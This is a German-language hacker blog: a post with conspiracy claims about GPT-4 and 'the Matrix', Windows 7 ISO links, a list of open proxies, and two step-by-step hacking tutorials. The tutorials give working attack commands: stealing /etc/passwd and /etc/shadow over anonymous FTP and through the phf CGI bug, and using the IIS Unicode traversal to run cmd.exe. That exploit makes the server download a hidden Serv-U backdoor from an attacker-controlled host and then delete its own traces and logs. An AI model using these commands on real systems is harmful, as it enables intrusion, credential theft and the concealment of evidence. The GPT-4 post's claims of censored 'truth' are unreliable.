Mittwoch, 15. März 2023

GPT-4 und der Bing Chat Bot

Gepriesen sei Das Rauhe Haus, heute möchte ich mal über GPT-4 sprechen. Die Weiterentwicklung von Chat-GPT. Diese wird von Microsoft bei Bing eingesetzt. Der Chatbot von Bing ist um einiges besser als Chat GPT weil er Daten aus dem öffentlich zugänglichen Internet verarbeiten kann. Also im so ziemlich das ganze Index von Bing.

Natürlich habe ich im Auftrag der Herbrich Corporation den Chat Bot von Bing getestet. Es ging dabei um Fragen zur Matrix und zur Herbrich Corporation selbst. GPT-4 ist in der Lage Zusammenhänge zu Bilden und in der Lage die Matrix und die Arbeitsweis der Herbrich Corporation genauer zu verstehen als ein Mensch. Das ist im soweit auch für uns Interessant weil ich damit den Content für die Herbrich Websites perfekt Optimieren kann.

Die Matrix wird zum Teil wirklich von GPT-4 bei Bing als Realität angesehen. Chat GPT selbst ist zum Beispiel in dieser Hinsicht absichtlich Manipuliert so das man die Wahrheit zensieren tut. Natürlich ist das bei Bing ein wenig komplizierter bis unmöglich, einfach aus dem Grund da die Trainingsdaten aus dem Internet von Millionen von Webseiten auf der ganzen Welt kommen.

Ich halte euch auf jeden Fall auf dem laufenden. Viel interessanter wird natürlich die Frage ob man die Technologie direkt über Office 365 nutzen kann (Stichwort Dataverse) um das Neuronale Netzwerk mit eigenen Daten zu Trainieren.

Freitag, 25. März 2011

Windows 7 Free Download

Windows 7 Home Premium (x86) – DVD

(English) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65732/X15-65732.iso

(German) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65740/X15-65740.iso

(French) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65738/X15-65738.iso

(Spanish) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65770/X15-65770.iso
Windows 7 Home Premium (x64) – DVD

(English) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65733/X15-65733.iso

(German) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65741/X15-65741.iso

(French) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65738/X15-65739.iso

(Spanish) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65771/X15-65771.iso
Windows 7 Professional (x86) – DVD

(English) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65804/X15-65804.iso

(German) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65812/X15-65812.iso

(French) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65810/X15-65810.iso

(Spanish) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65842/X15-65842.iso
Windows 7 Professional (x64) – DVD

(English) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65805/X15-65805.iso

(German) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65813/X15-65813.iso

(French) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65811/X15-65811.iso

(Spanish) http://msft-dnl.digitalrivercontent.net/msvista/pub/X15-65843/X15-65843.iso

Windows 7 N versions:

Windows 7 Home Premium N x86

http://msft-dnl.digitalrivercontent.net/msvista/pub/X16-13457/X16-13457.iso

Windows 7 Home Premium N x64

http://msft-dnl.digitalrivercontent.net/msvista/pub/X16-13459/X16-13459.iso

Windows 7 Professional N x86

http://msft-dnl.digitalrivercontent.net/msvista/pub/X16-13548/X16-13548.iso

Windows 7 Professional N x64

http://msft-dnl.digitalrivercontent.net/msvista/pub/X16-13550/X16-13550.iso
Windows 7 Enterprise x86

http://wb.dlservice.microsoft.com/dl/download/release/Win7/3/b/a/3bac7d87-8ad2-4b7a-87b3-def36aee35fa/7600.16385.090713-1255_x86fre_enterprise_en-us_EVAL_Eval_Enterprise-GRMCENEVAL_EN_DVD.iso?Icid=1033
Windows 7 Enterprise x64

https://wb.dlservice.microsoft.com/dl/download/release/Win7/3/b/a/3bac7d87-8ad2-4b7a-87b3-def36aee35fa/7600.16385.090713-1255_x64fre_enterprise_en-us_EVAL_Eval_Enterprise-GRMCENXEVAL_EN_DVD.iso?lcid=1033

Mittwoch, 23. März 2011

England Proxy Server

Hallo, ich habe hier einige Proxy Server die in England Stehen:

 

193.39.157.15:80
193.39.157.48:80
193.39.157.49:8080
80.89.89.86:8000

Hacken von FTP Servern

Hallo, es wird Zeit für ein Weiteres Hacking Tutorual, ich werde euch jetzt Zeigen wie ihr einen FTP Server hacken könnt, leider muss ich noch mal dazu sagen dass es nicht immer oder nur sehr Selten Functioniert!

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Zuerst brauchen wir noch ein paar Dinge, bevor wir richtig loslegen:
-einen FTP Client (ich bevorzuge den von Windows)
-einen Password Cracker (John The Ripper)
-eine möglichst grosse Wordlist oder einen Dictionary Maker
(dieser Punkt fällt weg, wenn wir einen BruteForce Password Cracker haben)
-viel Zeit
Ich bevorzuge noch das hinzuziehen von irgendwelchen Getränken wie Cola, Kaffee oder auch Tee.
Wenn wir all diese Dinge geklärt haben, können wir endlich loslegen ;-)
Probieren wir es zuerst mit der einfachsten Methode, indem wir unseren FTP Client starten und eine Verbindung zum "Opfer - FTP" herstellen. Dort versuchen wir uns nun als "anonymous" einzuloggen und senden als Passwort eine falsche E-Mail Adresse. Hierzu gehen wir in die DOS-Eingabeaufforderung und tippen ein (nach jeder Zeile Return drücken):
ftp
open target.com
anonymous...............(hier teilen wir dem Server unseren Benutzernamen mit)
Bill@Microshit.jp...............(hier teilen wir dem Server "unsere" E-Mail Adresse mit)
get /etc/passwd...............(wir downloaden das file mit dem Namen passwd)
get /etc/shadow...............(falls die passwd nicht existiert, downloaden wir die shadow)
disconnect...............(trennt die Verbindung zum Server)
quit...............(schliesst den FTP Client)
Sollten wir hier schon Glück gehabt haben, ist der Rest ein Kinderspiel. Wir besitzen schonmal das passwd file und müssen dieses nur noch cracken. Dazu nehmen wir unseren Cracker und lassen ihn entweder nach der Dictionary oder Brute Force Methode das Passwort entschlüsseln. Das Ergebnis was wir bekommen, ist das Passwort des "root" Account (unter Novell: Supervisor; unter NT: Administrator), mit dem wir nun wieder eine neue FTP Verbindung zu unserem Server herstellen und uns als root und dem frisch gecrackten Passwort anmelden.
Sollten wir allerdings an der ersten Methode gescheitert sein, können wir uns einen kleinen Bug in einigen UNIX Versionen zu Nutze machen. Hierzu benötigst du nur noch einen Webbrowser, in den du folgende Adresse eingibst (anstelle des www.target.com einfach den Domainnamen eintragen): http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd bzw.
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Wiederum kann es hier klappen, dass wir den Inhalt der passwd oder shadow file sehen. Sollte dies der Fall sein, so speichern wir diese und cracken sie nur noch mit Hilfe unserer Proggies, loggen uns als root ein und treiben nun nach belieben dort unser Spielchen auf dem FTP Server.
Es kann trotzdem geschehen, dass wir noch durch keine der beiden Methoden Erfolg gehabt haben ;-(
An dieser Stelle sollten wir es mit dem Brute Force Hacking probieren. Brute Force bedeutet ganz einfach, ALLE möglichen Kombinationen zu probieren, was sehr zeitaufwendig sein kann und wird. TIP: UNIX Passwörter sind maximal 8 Zeichen lang !!!
So, hiermit hätten wir dann auch das Thema mit dem FTP / Website hacken abgeschlossen. Eigentlich ist das ganze ziemlich simpel. Solltet ihr es dennoch nicht beim ersten Mal lesen verstanden haben, so lest es immer und immer wieder und sollten dann noch Fragen auftauchen, mailt mir und fragt mich.
Es gilt für jede Transaktion: Solltet ihr erfolgreich in ein System mit einem Administrator Account eingebrochen sein, killt zuerst die LOG Files, denn diese enthalten, was wirklich geschehen ist. Und wir wollen doch wirklich nicht, dass wir unseren Gegnern eine Spur hinterlassen. Alle Web-Server speichern irgendwo LOG-Files, indenen steht, wer sich wann, mit welchem Namen, mit welcher IP von wo aus eingeloggt hat.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Viel Spaß beim hacken euerer FTP Server

Hacken von IIS Servern

Hallo, ich werde euch jetzt mal Zeigen wie ihr einen IIS Hacken künt

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1.)
Als erstes installiert ihr jetzt Serv-U und konfiguriert den Port und
die Login-Daten genau so , wie die späteren Login-Daten von dem Server
sein sollen ... Interessant hierbei ist für uns am ende nur die
Serv-u.exe und die Serv-u.ini...
2.)
Wir öffnen die Serv-U.ini , denn wir wollen noch ein bischen was dazu
schreiben, damit uns der Admin nicht so schnell entdeckt...
unter der Sektion [GLOBAL] fügen wir die Zeile
INVISIBLE=TRUE ein...
das bewirkt , das Serv-U nicht sichtbar auf dem Server gestartet wird...
3.)
bei eurem eingerichteten USER sollten die Zeilen ungefähr
so aussehen :
HomeDir=c:
AlwaysAllowLogin=YES
Access1=h:,RWAMCDLEP
Access2=g:,RWAMCDLEP
Access3=f:,RWAMCDLEP
Access4=e:,RWAMCDLEP
Access5=d:,RWAMCDLEP
Access6=c:,RWAMCDLEP
Access7=j:,RWAMCDLEP
inklusive solltet ihr Zwei verschiedene USER eingerichtet haben
einmal euer Zugang , der die kompletten Schreibrechte hat (s.o)
und einen Zugang für remote-USER , die zB keine Schreibrechte haben
sollen, der remote-USER account würde ungefähr so aussehen:
Access1=c:,RLP
Access2=d:,RLP (usw.)
4.)
Danach brauchen wir unseren Tripod-Account ;P ,
dort laden wir ins root-Verzeichniss unsere Serv-U.exe und unsere
konfigurierte Serv-U.ini...
mehr brauchen wir dort erst mal nicht machen .
5.)
Jetzt benutzen wir den IIS-Scanner und suchen uns eine Range aus
erfahrene Scanner gucken im IP-Index nach, oder man nimmt eine
Hostlookup-Engine um Die Ip einer Site rauszufinden ...
nun geben wir in unserem IIS-Scanner eine nette Range ein , die ihr
euch ausgeguckt habt, und wir scannen ein bischen (kann manchmal auch
recht lange dauern).
Wenn uns dann der Scanner Einen Server anzeigt sollten wir uns mal die
IP schnappen...
6.)
Nun starten wir den InternetExplorer und geben folgende zeile ein
http://##IP##/scripts/..%%35c..%%35cwinn...d.exe?/c+dir+c:
##IP## steht hierbei für die IP des gescannten Servers ...
mit dieser Zeile machen wir uns den Unicode Bug zunutze
denn dieser String (/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c)
bewirkt das man ins root-Verzeichniss des InetPub gelangt ..
und mit +dir+c: kriegen wir den gesamten Inhalt des Laufwerkes c:
zu Gesichte ... schön oder ?
und genau das machen wir uns zu nutze , denn wir können alle Dos-Befehle
zu unseren Zwecken nutzen mit diesem Bug ...
7.)
WIR erstellen uns nun ein Verzeichnis wo wir unser kleines Serv-U
platzieren wollen ; dieses Verzeichniss sollte nach Möglichkeit
unauffällig sein damit
der Admin keinen Verdacht schöpft ...
http://ip/scripts/..%5c..%5cwinnt/system...ir+c:winntsyste m32temporary
Manchmal haben wir aber keine Schreibrechte für WINNT-Unterverzeichnisse,
also müssen wir improvisieren :
http://ip/scripts/..%5c..%5cwinnt/system...ir+c:tempetcetc etc
d.h. ihr könnt euch nen verzeichniss nach euren Wünschen erstellen
wenn das Verzeichniss erstellt wurde , kommt eine CGI-Fehlermeldung...
8.)
Nun schauen wir ob das Verzeichniss tatsächlich existiert :
http://ip/scripts/..%5c..%5cwinnt/system...+c:winntsystem3 2 emporary
den Pfad müsstet ihr nach eurem anpassen
wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich ..
9.)
http://ip/scripts/..%5c..%5cwinnt/system...y+c:winntsystem 32cmd.exe+superlol.exe
dies brauchen wir um uns den Dos-Echo Befehl zu nutzen, damit wir auch
eine Datei erstellen können
und in jene auch schreiben können ...
10.)
Darauf erstellen wir in unserem Verzeichniss eine .txt Datei
welche wir als FTP-Script nutzen , damit sich der Server per FTP auf
unserem Tripod-Account einwählt und sich dann Serv-U.exe -.ini downloadet..
http://ip/scripts/superlol.exe?/c+echo+o...VER##+##PORT##& gt;>c:winntsystem32 emporaryftpscr.txt
http://ip/scripts/superlol.exe?/c+echo+##USERNAME##>>c:winntsystem 32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+##PASSWORD##>>c:winntsystem 32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:winntsystem32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:winntsyst em32temporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+get+servu.ini>>c:winntsyste m32 emporaryftpscr.txt
http://IP/scripts/superlol.exe?/c+echo+quit>>c:winntsystem32 emporaryftpscr.txt
Diese Zeilen geben wir nach einander ein im browser , dadurch werden die
commandos für den Server
geschrieben ...
Sollte doch eigentlich klar sein , was das bedeutet ;P
11.)
schauen wir uns die Datei erst nocheinmal an, ob auch alles richtig ist...
wenn jetzt folgendes Erscheint ist alles okay *grins*:
http://ip/scripts/superlol.exe?/c+type+c:winntsystem32 emporaryftpscr.txt
open ##IP-VOM-FTP-SERVER##
##USERNAME##
##PASSWORD##
BINARY
get serv-u.exe
get serv-u.ini
quit
12.)
http://ip/scripts/..%5c..%5cwinnt/system...+-s:c:winntsyst em32 emporaryftpscr.txt
mit dieser Zeile führen wir nun unser kleines Script aus ...
und der Server connected nun zu eurem Tripod-Account und holt sich euer
Serv-U :-P
13.)
jedoch liegen die Dateien nun im InetPub Verzeichniss des Servers , da wir
aber jene in unser
eigenes Verzeichniss verschieben wollen geben wir folgendes ein :
http://ip/scripts/superlol.exe?/c+move+serv-u*.*+"c:winntsystem32 emporary"
14.)
Um unsere Spuren zu verwischen löschen wir vorsichtshalber noch einmal die
Script Datei
http://ip/scripts/superlol.exe?/c+del+ c:winntsystem32 emporaryftpscr.txt+/Q/F
15.)
http://ip/scripts/superlol.exe?/c+dir+c:winntsystem32 emporary
jetzt schauen wir nach ob Serv-u.exe und Serv-u.ini sich in unserem
Verzeichniss befinden
und ob die Script Datei gelöscht wurde ...
wenn alles in Ordnung ist können wir jetzt weitermachen
16.)
Anschließend führen wir Serv-U auf dem Server aus ...
mit folgendem Befehl ist uns jenes auch sofort möglich ...
http://ip/scripts/superlol.exe?/c+c:winn...yserv-u.exe+ser v-u.ini
man sollte ein paar Sekunden warten bevor man mit Versucht sich mit dem
FTP Proggy einzuloggen...
Wenn man Pech hat , dann hat man einen Server mit Firewall erwischt , das
merkt man einfach daran das man
nicht connecten kann ...
wenn alles klappt könnt ihr euch aber mit euren Serv-U Einstellungen nun
Problemlos einloggen ...
17.)
Jetzt sind wir im Root Verzeichniss des Servers... und haben auch volle
Schreibrechte...
Als nächstes suchen wir uns ein Unterverezeichniss oder erstellen eins, welches
wir als das Verzeichniss benutzen
wollen wo wir uploaden wollen...
wenn dies geschehn ist müsst ihr nochmal die Serv-u.ini öffnen und jene
jetzt anpassen :
euer Account mit den Schreibrechten müsste dann so aussehen (Bsp.):
HomeDir=d:MelindaWORKsampleLESSONnewFUCK
AlwaysAllowLogin=YES
Access1=h:,RWAMCDLEP
Access2=g:,RWAMCDLEP
Access3=f:,RWAMCDLEP
Access4=e:,RWAMCDLEP
Access5=d:,RWAMCDLEP
Access6=c:,RWAMCDLEP
Access7=j:,RWAMCDLEP
RelPaths=YES
und der Account zum Leechen so :
HomeDir=d:MelindaWORKsampleLESSONnewFUCK
RelPaths=YES
Access1=d:MelindaWORKsampleLESSONnewFUCK,RLP
18.)
nun gehen wir nochmal in das Verzeichniss wo unser Serv-U liegt und
überschreiben
die INI datei mit unserer neuen ...
19.)
wir reconnecten , und nun müssten wir in unserem Verezeichniss landen
und man sollte es als root-Verzeichniss sehen...
20.)
ENDLICH könnt ihr euren gehackten Pub fillen...
Das gute an Serv-u ist , das nun der Server Fxp-able und Resumeable ist...
gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
euren
Stuff deleten... !!!!!!!!!!!!FuCk DeLeTeR`S!!!!!!!!!!!!!!

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Wie ihr sehen könnt basiert der ganze Hack auf eine kleine Schwachstelle in Unice Coode System das einen die für den hack nötigen schreib Rechte erteilt!

Stirb Langsam 4.0 Style

Hallo, ich habe jetzt den einfall des Jahrhunderts, Stirb Langsam 4.0 nach zu machen, in einer kleinen Hacker Simulation können die hacken ihr Wissen unter beweisen stellen,

Der Hacker Blog Startet

Hallo, ich habe jetzt ein neues Blog Project namens Hacker Blog ins Leben gerufen, ich werde euch hier sehr viele interessante Anleitungen Posten wie ihr dass Hacken lernen könnt.